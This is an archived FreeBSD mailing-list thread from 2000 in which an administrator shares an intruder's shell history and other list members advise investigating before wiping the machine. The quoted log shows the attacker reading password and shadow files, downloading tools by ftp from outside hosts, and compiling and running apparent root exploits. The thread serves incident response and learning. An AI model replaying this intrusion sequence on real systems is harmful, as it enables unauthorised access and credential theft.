Date: Mon, 18 Dec 2000 16:14:20 -0500 (EST) From: Alexander V P <alex@big-blue.net> To: Joe Oliveiro <joe@advancewebhosting.com> Cc: "Gerald T. Freymann" <freymann@eagle.ca>, Questions <questions@FreeBSD.ORG> Subject: Re: Hacker history file - OUCH Message-ID: <Pine.BSF.4.05.10012181605150.23598-100000@borg.starbase.net> In-Reply-To: <Pine.BSF.4.21.0012181556100.6889-100000@joe.pythonvideo.com>
next in thread | previous in thread | raw e-mail | index | archive | help
hi, nothing wrong with that as far as i'm concern. we ( freebsd community) don't have that many breakings and every one needs to be investigated. personally i would do that and post somewhere results, so tomorrow (less expirienced, fortunate etc) admins can read about it. after all i'll wipe that box anyway ;-). it takes a lotsa guts to post on freebsd mailing list ( or anywhere for that matter) something like this. alex On Mon, 18 Dec 2000, Joe Oliveiro wrote: > i like wiping the box! > > Microsoft: "Where would you like to go to today" > Linux: "Where would you like to go tomorrow" > FreeBSD: "Hey,when are you guys going to catch up" > > > On Mon, 18 Dec 2000, Alexander V P wrote: > > > hi, > > do you keep/have logs about what ftp transfers he did? > > did you send mail to root@he.net, or .mx domain? > > any idea how he break in? what freebsd you're using? > > if i'm on your place, i'll unplug the box and try to find out more about > > this. don't do like most of the sysadmins that just wipe the box. > > alex > > > > On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > > > > > > > > > Seems we have an intruder on one of our boxes... the .history file from the > > > troubled account follows: > > > > > > cd bnc > > > ls > > > ./bash > > > who > > > cd /etc > > > more passwd > > > ps -l > > > ls -l > > > more pwd.db > > > more hosts > > > pico adduser.conf.bak > > > pico group > > > su user > > > pico group.bak > > > pico ftpuser > > > O > > > pico ftpusers > > > su toor > > > su operator > > > id > > > pico spwd.db > > > su wheel > > > pico passwd > > > cd /var/tmp > > > ls -a > > > cd ... > > > ls -a > > > cd .. > > > ls -l > > > ls -al > > > cd ... > > > ftp copper.he.net > > > chmod u+x xcon > > > ./xcon > > > id > > > rm * > > > ls > > > who > > > cd /var/tmp > > > ls -a > > > ls -al > > > cd ... > > > ls -a > > > ftp cih.edu.mx > > > ls > > > cc bsd1 bsd-cron.c > > > cc -o bsd1 bsd-cron.c > > > ./bsd1 > > > id > > > cc -o bsd2 bsd2.c > > > ./bsd2 > > > id > > > ls > > > ftp cih.edu.mx > > > ./bsd sh > > > ./bsd.sh > > > chmod u+x bsd.sh > > > ./bsd.sh > > > /tmp/sh > > > id > > > ls > > > cc -o bsdsmail bsdsmail.c > > > ./bsdsmail > > > ls -a > > > pico hack > > > ls > > > pico user.inf > > > ls > > > id > > > rm * > > > exit > > > > > > Anybody recognize what the intruder has set up? > > > > > > -Gerry > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.05.10012181605150.23598-100000>